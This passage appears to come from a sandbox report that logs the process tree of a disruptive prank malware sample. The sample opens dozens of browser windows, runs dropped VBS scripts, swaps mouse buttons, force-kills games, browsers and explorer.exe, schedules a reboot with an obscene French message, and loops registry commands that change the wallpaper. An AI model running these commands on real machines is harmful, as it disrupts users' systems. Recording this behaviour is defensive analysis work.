      4⤵
      PID:8428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8616
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8648
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:2364
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:704
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:1516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:3968
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:9012
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:9052
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:3716
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8260
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:3152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:3920
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:3700
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8660
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:5624
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:5888
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:5132
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21446.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:3760
- - C:\Windows\system32\timeout.exe
    timeout 60
    3⤵
    - Delays execution with timeout.exe
    PID:4932
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:2336
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19074.vbs"
    3⤵
    PID:2064
- - C:\Windows\system32\timeout.exe
    timeout 14
    3⤵
    - Delays execution with timeout.exe
    PID:3020
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hl2.exe
    3⤵
    - Kills process with taskkill
    PID:2040
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM javaw.exe
    3⤵
    - Kills process with taskkill
    PID:4816
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM RobloxPlayerBeta.exe
    3⤵
    - Kills process with taskkill
    PID:1468
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:1596
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM GenshinImpact.exe
    3⤵
    - Kills process with taskkill
    PID:1572
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM Among Us.exe
    3⤵
    - Kills process with taskkill
    PID:4848
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    PID:4668
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    PID:1452
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    PID:4664
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    PID:3328
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    PID:3112
- - C:\Windows\system32\shutdown.exe
    shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"
    3⤵
    PID:2968
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26117.vbs"
    3⤵
    - Blocklisted process makes network request
    - Enumerates connected drives
    PID:4772
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19267.vbs"
    3⤵
    - Enumerates connected drives
    PID:1060
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26847.vbs"
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - System Location Discovery: System Language Discovery
    PID:928
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2561.vbs" 19628.bat
    3⤵
    PID:5052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\19628.bat" "
      4⤵
      Modifies registry class
      PID:428
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2820
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:792
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2588
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1440
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4652
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:3696
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1468
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4112
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2436
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4676
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2744
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:4728
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3456
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3960
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3528
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2396
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2176
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:3328
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:424
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3152
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3532
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1600
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3576
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:5104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3660
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3600
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3732
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:960
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4216
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:4204
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3520
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3440
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:952
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1304
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:896
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:4024
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2796
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2072
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1716
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2272
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3340
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:4448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4536
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4580
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2244
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2584
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2544
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:2456
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4468
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4744
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3188
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4508
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1652
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:4224
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:440
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2256
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3544
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3220
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2588
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:3472
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1196
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3604
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4080
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1468
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4112
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:4488
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4676
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:876
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3960
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1780
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:460
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:1188
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4120
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3532
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1600
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2932
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3672
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:3720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4212
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3520
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3440
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:952
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:1212
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1528
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3964
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4856
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2228
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3796
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:2072
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3784
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2988
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4536
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3036
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2244
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:4012
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2544
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4468
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3188
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3068
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4820
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:2820
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3544
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1440
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3828
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3604
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:1596
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2436
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4404
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2468
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4664
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:572
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:3112
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4120
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3576
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3704
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:3672
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4208
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
        5⤵
        
        PID:3364
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3520
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:896
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:4548
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2464
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2064
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
